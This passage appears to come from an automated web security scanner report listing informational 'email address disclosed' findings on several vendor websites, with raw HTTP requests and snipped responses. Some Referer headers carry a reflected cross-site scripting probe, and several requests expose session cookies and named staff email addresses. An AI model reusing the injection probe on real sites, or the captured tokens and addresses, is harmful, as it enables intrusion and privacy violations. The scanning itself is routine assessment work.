20.101. http://www.barracudanetworks.com/ns/js/wysiwyg/wysiwyg.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/js/wysiwyg/wysiwyg.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ns/js/wysiwyg/wysiwyg.js?v=2009-04-03a HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: barra_tracking_code=google-na_WebAppFirewallWW_WebApplicationSecurity; barra_tracking_code_keyword=web+application+security; __debug=TDO; barra_referer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Wed, 20 May 2009 20:16:11 GMT
Accept-Ranges: bytes
ETag: "e4e49cd187d9c91:1978"
Date: Sun, 04 Sep 2011 16:18:44 GMT
Vary: Accept-Encoding
Content-Length: 34315

//
// openWYSIWYG v1.0 Copyright (c) 2006 openWebWare.com
// This copyright notice MUST stay intact for use.
//
// An open source WYSIWYG editor for use in web based applications.
// For full sou
...[SNIP]...
ption : Emulates insertAdjacentHTML(), insertAdjacentText() and
    insertAdjacentElement() three functions so they work with
                               Netscape 6/Mozilla
Notes : by Thor Larholm me@jscript.dk
\* ---------------------------------------------------------------------- */
if(typeof HTMLElement!="undefined" && !HTMLElement.prototype.insertAdjacentElement){
HTMLElement.prototype.insertAdjac
...[SNIP]...

20.102. http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cgisecurity.com
Path:   /lib/XmlHTTPRequest.shtml

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/XmlHTTPRequest.shtml HTTP/1.1
Host: www.cgisecurity.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Referrer+data+found+in+displayed+innerHTML#sclient=psy&hl=en&source=hp&q=Referrer+data+displayed+innerHTML&pbx=1&oq=Referrer+data+displayed+innerHTML&aq=f&aqi=&aql=&gs_sm=e&gs_upl=9979l11361l0l11816l9l8l0l0l0l1l906l906l6-1l1l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web035
X-Webserver: oak-tp-web035
Vary: cookie
Expires: Mon, 05 Sep 2011 06:23:12 GMT
Last-Modified: Mon, 19 Jan 2009 05:58:20 GMT
Content-Disposition: inline; filename=XmlHTTPRequest.shtml
Content-Type: text/html; charset=utf-8
Keep-Alive: timeout=300, max=100
Content-Length: 42599
Date: Mon, 05 Sep 2011 02:23:13 GMT
X-Varnish: 3033115944 3033114404
Age: 1
Via: 1.1 varnish

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <link rel="stylesheet" href="/i/styles.css" type="text/css" med
...[SNIP]...
<input onchange="handleChange(this)" tabindex="2" id="email" name="email" value="foo@bar.com"/>
...[SNIP]...

20.103. http://www.cymphonix.com/2011-shaping-demo-sem.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cymphonix.com
Path:   /2011-shaping-demo-sem.html

Issue detail

The following email address was disclosed in the response:

Request

GET /2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g HTTP/1.1
Host: www.cymphonix.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:07 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 14014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<a class="footer" href="mailto:sales@cymphonix.com">sales@cymphonix.com</a>
...[SNIP]...

20.104. http://www.cymphonix.com/scripts/scriptaculous/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cymphonix.com
Path:   /scripts/scriptaculous/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/scriptaculous/controls.js HTTP/1.1
Host: www.cymphonix.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cymphonix=ed2a4b21173896ec1d2a1d8f02f1f40b

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:18:37 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Thu, 08 Oct 2009 04:03:38 GMT
ETag: "31101e-87e3-8c4eda80"
Accept-Ranges: bytes
Content-Length: 34787
Content-Type: application/x-javascript

// script.aculo.us controls.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

20.105. http://www.cymphonix.com/scripts/scriptaculous/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cymphonix.com
Path:   /scripts/scriptaculous/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/scriptaculous/dragdrop.js HTTP/1.1
Host: www.cymphonix.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cymphonix=ed2a4b21173896ec1d2a1d8f02f1f40b

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:18:37 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Thu, 08 Oct 2009 04:03:38 GMT
ETag: "31101a-79c6-8c4eda80"
Accept-Ranges: bytes
Content-Length: 31174
Content-Type: application/x-javascript

// script.aculo.us dragdrop.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thro
...[SNIP]...

20.106. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The following email address was disclosed in the response:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=site%3Axss.cx+usa.kapersky.com HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:14:47 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76490

<!doctype html><head><title>site:xss.cx usa.kapersky.com - Google Search</title><script>window.google={kEI:"lzBkTtb0HsjniAL736iVCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute
...[SNIP]...
on(){m.prm&&m.prm()},Ua=function(a){s("m",function(){m.spn(a)})},Va=function(a){s("m",function(){m.spp(a)})};n("spn",Ua);n("spp",Va);Aa("gbd4",Ta);
if(_tvb("true",e)){var Wa={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh4.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};o.prf=Wa}
if(_tvv("1")&&_tvv(
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...

20.107. http://www.hellobar.com/hellobar-5462-3430.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hellobar.com
Path:   /hellobar-5462-3430.js

Issue detail

The following email address was disclosed in the response:

Request

GET /hellobar-5462-3430.js HTTP/1.1
Host: www.hellobar.com
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 04 Sep 2011 16:17:14 GMT
Content-Type: application/x-javascript
Last-Modified: Sat, 03 Sep 2011 03:03:39 GMT
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 28872

/*** Cached response generated at 2011-09-02T20:03:39-07:00 ***/

/*
* Hello Bar JavaScript Core 1.1.7
*
* Copyright (c) 2010, digital-telepathy. All rights reserved.
*
* 1. Permitted uses
...[SNIP]...
<span>50% Off Mock Interviews - Email Chris@wallstreetoasis.com to</span>
...[SNIP]...

20.108. http://www.hp.com/cma/metrics/survey/learningcenter.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hp.com
Path:   /cma/metrics/survey/learningcenter.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cma/metrics/survey/learningcenter.js HTTP/1.1
Host: www.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:43:47 GMT
Server: Apache
ETag: "475c19b17aa80"
Accept-Ranges: bytes
Cache-Control: max-age=7200
Expires: Mon, 05 Sep 2011 00:43:47 GMT
Content-Length: 4793
Content-Type: application/x-javascript

<!--
//=============================================================================================//
// -->    NAME            :    Survey Configuration File (North America)
// -->    AUTHOR            :    Jonathan Brumley (jonathan.brumley@hp.com)
// -->
...[SNIP]...

20.109. http://www.hp.com/cma/metrics/survey/lib/sup_class2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hp.com
Path:   /cma/metrics/survey/lib/sup_class2.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cma/metrics/survey/lib/sup_class2.js HTTP/1.1
Host: www.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; EMID=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:43:56 GMT
Server: Apache
ETag: "45b726b36de80"
Accept-Ranges: bytes
Cache-Control: max-age=7200
Expires: Mon, 05 Sep 2011 00:43:56 GMT
Content-Length: 22531
Content-Type: application/x-javascript

<!--
//=============================================================================================//
// -->    NAME            =    Supplemental Class (North America)
// -->    VERSION            =    1.0
// -->    FILE NAME        =    sup_class.js
// -->    AUTHOR            =    Jonathan Brumley (jonathan.brumley@hp.com)
// -->
...[SNIP]...

20.110. http://www.hp.com/cma/metrics/survey/na_num_clicks.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hp.com
Path:   /cma/metrics/survey/na_num_clicks.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cma/metrics/survey/na_num_clicks.js HTTP/1.1
Host: www.hp.com
Proxy-Connection: keep-alive
Referer: http://search.hp.com/query.html?lang=en&qp=&search=&qt=xss&la=en&hps=Home&hpr=http%3A//h41131.www4.hp.com/us/en&charset=utf-8&cc=us&hpn=Home&hpa=http%3A//www.hp.com/country/us/en/contact_us.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; prop12=r1002; EMID=; s_depth=2; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:47 GMT
Server: Apache
ETag: "48e095ef7f180"
Accept-Ranges: bytes
Cache-Control: max-age=7200
Expires: Sun, 04 Sep 2011 18:19:47 GMT
Content-Length: 21313
Content-Type: application/x-javascript

<!--
//=============================================================================================//
// -->    NAME            :    Number of Clicks (North America)
// -->    VERSION            :    1.0
// -->    FILE NAME        :    na_num_clicks.js
// -->    AUTHOR            :    Jonathan Brumley (jonathan.brumley@hp.com)
// -->
...[SNIP]...

20.111. http://www.imperva.com/js/lightbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imperva.com
Path:   /js/lightbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/lightbox.js HTTP/1.1
Host: www.imperva.com
Proxy-Connection: keep-alive
Referer: http://www.imperva.com/products/wsc_web-application-firewall.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 24689
Content-Type: application/x-javascript
Last-Modified: Fri, 27 Mar 2009 23:35:57 GMT
Accept-Ranges: bytes
ETag: "f4761ec734afc91:23b6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:17:59 GMT

// -----------------------------------------------------------------------------------
//
//    Lightbox v2.03.3
//    by Lokesh Dhakar - http://www.huddletogether.com
//    5/21/06
//
//    For more inform
...[SNIP]...
n";
   }

}


// ---------------------------------------------------

//
// pause(numberMillis)
// Pauses code execution for specified time. Uses busy code, not good.
// Help from Ran Bar-On [ran2103@gmail.com]
//

function pause(ms){
   var date = new Date();
   curDate = null;
   do{var curDate = new Date();}
   while( curDate - date < ms);
}
/*
function pause(numberMillis) {
   var curently = new Date()
...[SNIP]...

20.112. http://www.imperva.com/js/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imperva.com
Path:   /js/prototype.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/prototype.js HTTP/1.1
Host: www.imperva.com
Proxy-Connection: keep-alive
Referer: http://www.imperva.com/products/wsc_web-application-firewall.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 47603
Content-Type: application/x-javascript
Last-Modified: Fri, 27 Mar 2009 23:35:57 GMT
Accept-Ranges: bytes
ETag: "d4e790c734afc91:23b6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:17:59 GMT

/* Prototype JavaScript framework, version 1.4.0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff
* against the source tree
...[SNIP]...

20.113. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 04 Sep 2011 16:18:16 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9732


var lhnTrack='f';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnl
...[SNIP]...
reen.width - 580-32) / 2;
var wtop = (screen.height - 420-96) / 2;
   if (document.location.protocol=='https:')
   {
       window.open('https://www.livehelpnow.net/lhn/livechat.aspx?fullname=Visitor&email=unknown_email@livehelpnow.com&lhnmes=lhn&zzwindow=' + lhnwindow + '&lhnid=' + 1288,'lhnchat','left=' + wleft + ',top=' + wtop + ',width=580,height=435,toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=no,copyhistory=no,resizable=yes');
   }
   else
   {
    window.open('http://www.livehelpnow.net/lhn/livechat.aspx?fullname=Visitor&email=unknown_email@livehelpnow.net&lhnmes=lhn&zzwindow=' + lhnwindow + '&lhnid=' + 1288,'lhnchat','left=' + wleft + ',top=' + wtop + ',width=580,height=435,toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=no,copyh
...[SNIP]...

20.114. http://www.radware.com/javascript/formRtns.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radware.com
Path:   /javascript/formRtns.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /javascript/formRtns.js HTTP/1.1
Host: www.radware.com
Proxy-Connection: keep-alive
Referer: http://www.radware.com/Resources/AppWallSolution.aspx?source=google&9gtype=search&9gkw=web%20application%20security&9gad=8494610116.1&9gpla=&9gag=2157798556&gclid=CLjykYz_g6sCFQwaQgodAQy8yw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.radware.com&SiteLanguage=1033; EktGUID=f0e1f9a9-288d-4d6f-b42a-99d60033449b; EkAnalytics=0; ASP.NET_SessionId=inao2q55xdagir45kkcxtr3o

Response

HTTP/1.1 200 OK
Content-Length: 55464
Content-Type: application/x-javascript
Expires: Mon, 08 Nov 2010 04:00:00 GMT
Last-Modified: Thu, 14 Jul 2011 15:27:30 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:18:31 GMT

...
//Functions for Capcha
function CheckImage() {
var verified;
var notverifed;
var returnValue;
var cookie = document.cookie;
var start = cookie.indexOf('hidCAPTCHA');

...[SNIP]...
<div> element
        myel.hide();
       }
}
//Function to check region
function chk_region(name)//hide show courses
{
var AmericaEmails = 'training@radware.com; webmaster@radware.com;'
//var AmericaEmails = 'nchipko@murraymedia.com; dherrmann@murraymedia.com; mkinner@murraymedia.com'
var EMEAEmails = 'emea_training@radware.com; webmaster@radware.com'
var APACEmails = 'apac_training@radware.com; webmaster@radware.com'

// hide courses
var myel = $('#divCourses');
       if (myel){
           // collasp America courses <div>
...[SNIP]...
divEMEA":
myel.value=EMEAEmails;
break;
case "divAPAC":
myel.value=APACEmails;
break;
default :
myel.value='webmaster@radware.com';
}
}
}

function chk_regionEmail(name)//hide show courses
{
var AmericaEmails = 'elizabeth.bourg@radware.com; susan.peter@Radware.com'
// var AmericaEmails = 'nchipko@murraymedia.com; dherrmann@murraymedia.com; mkinner@murraymedia.com'
var EMEAEmails = 'AlainL@radware.com; AlexandreB@radware.com'
var APACEmails = 'EdmundW@radware.com'

// see who to send emails to
   myel = document.getElementById('region_emails');
       if (myel){
       
    switch (name.options[name.selectedIndex].value ){
    case "divAmerica":

...[SNIP]...
divEMEA":
myel.value=EMEAEmails;
break;
case "divAPAC":
myel.value=APACEmails;
break;
default :
myel.value='webmaster@radware.com';
}
}
}
function chk_topic()//hide show courses
{
var topel = $('#ID135225');
if (topel){

// see who to send emails to
var myel = document.forms[0].country_emails;
       if (myel){
        if(topel.checked){
    myel.value='ir@radware.com';
    }
    else
{
var cel = document.forms[0].Country;

    myel.value= getmail(cel.options[cel.selectedIndex].value );
           //alert(myel.value);

...[SNIP]...
urce to form
var newWin = window.open(url);

window.history.back();
newWin.focus();
}

function chk_RegionTrain(name)//hide state and province
{
var AmericaEmails = 'training@radware.com; webmaster@radware.com'
//var AmericaEmails = 'nchipko@murraymedia.com; dherrmann@murraymedia.com; mkinner@murraymedia.com'
var EMEAEmails = 'emea_training@radware.com'
var APACEmails = 'apac_training@radware.com'
// hide courses
myel = $('#divTrainDays');
       if (myel){
           // collasp APAC courses <div>
...[SNIP]...
divEMEA":
myel.value=EMEAEmails;
break;
case "divAPAC":
myel.value=APACEmails;
break;
default :
myel.value='webmaster@radware.com';
}
}
   }
}


function getmail(countrycode)
{
switch (countrycode){
// radware-info
case "PR":
return "info@radware.com";
break;
case "AS":
return "info@radware.com";
break;
case "AI":
return "info@radware.com";
break;
case "AQ":
return "info@radware.com";
break;
case "AG":
return "info@radware.com";
break;
case "AR":
return "info@radware.com";
break;
case "AW":
return "info@radware.com";
break;
case "BS":
return "info@radware.com";
break;
case "BB":
return "info@radware.com";
break;
case "BZ":
return "info@radware.com";
break;
case "BM":
return "info@radware.com";
break;
case "BO":
return "info@radware.com";
break;
case "BR":
return "info@radware.com";
break;
case "CA":
return "info@radware.com";
break;
case "KY":
return "info@radware.com";
break;
case "CL":
return "info@radware.com";
break;
case "CO":
return "info@radware.com";
break;
case "CR":
return "info@radware.com";
break;
case "CU":
return "info@radware.com";
break;
case "DO":
return "info@radware.com";
break;
case "EC":
return "info@radware.com";
break;
case "SV":
return "info@radware.com";
break;
case "GF":
return "info@radware.com";
break;
case "GU":
return "info@radware.com";
break;
case "GT":
return "info@radware.com";
break;
case "GY":
return "info@radware.com";
break;
case "HT":
return "info@radware.com";
break;
case "HN":
return "info@radware.com";
break;
